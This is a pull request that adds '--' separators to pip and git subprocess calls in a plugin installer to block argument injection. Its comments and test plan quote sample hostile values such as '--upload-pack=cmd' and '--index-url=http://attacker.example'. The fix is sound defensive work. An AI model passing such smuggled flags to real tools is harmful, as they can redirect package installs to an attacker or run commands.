### PR TITLE
[security] Add -- separator to plugin install pip/git argv

### DIFF
--- a/src/pollypm/plugin_cli.py
+++ b/src/pollypm/plugin_cli.py
@@ -321,8 +321,11 @@ def install_plugin(
             code = 1
         else:
             try:
+                # ``--`` stops git from interpreting a hostile ``spec`` as a
+                # flag (e.g. ``--upload-pack=cmd``). ``_looks_like_git_url``
+                # already gates the prefixes, but defense in depth is cheap.
                 subprocess.run(
-                    ["git", "clone", spec, str(target)],
+                    ["git", "clone", "--", spec, str(target)],
                     check=True, capture_output=True, text=True,
                 )
                 result["installed"] = str(target)
@@ -333,8 +336,12 @@ def install_plugin(
                 code = 1
     else:
         try:
+            # ``--`` separates pip's options from positional package
+            # arguments — without it a malicious ``spec`` like
+            # ``--index-url=http://attacker.example`` would be parsed as
+            # an option rather than a package name.
             proc = subprocess.run(
-                [sys.executable, "-m", "pip", "install", spec],
+                [sys.executable, "-m", "pip", "install", "--", spec],
                 check=True, capture_output=True, text=True,
             )
             result["method"] = "pip_install"
@@ -375,8 +382,11 @@ def uninstall_plugin(
         result["method"] = "directory_remove"
     else:
         try:
+            # ``--`` for the same reason as the install path: keep ``name``
+            # strictly positional even if a future caller forwards a
+            # hyphen-leading string.
             proc = subprocess.run(
-                [sys.executable, "-m", "pip", "uninstall", "-y", name],
+                [sys.executable, "-m", "pip", "uninstall", "-y", "--", name],
                 check=True, capture_output=True, text=True,
             )
             result["method"] = "pip_uninstall"


### PR DESCRIPTION
## Summary
- Inserts ``--`` between the pip / git / pip-uninstall subcommand and the user-supplied ``spec`` / ``name`` so a hostile leading-``--`` argument can no longer be parsed as an option.
- The ``_looks_like_git_url`` gate already restricts the git path to URL-shaped prefixes, but defence in depth is cheap.

Fixes #1379.

## Test plan
- [ ] ``pm plugin install -- --index-url=http://example.com`` (or similar) now reports a pip "no such package" rather than honouring the flag.
- [ ] ``pm plugin install <real-pkg>`` still installs normally.
- [ ] ``pm plugin install https://github.com/foo/bar.git`` still clones.
- [ ] ``pm plugin uninstall <name>`` still works.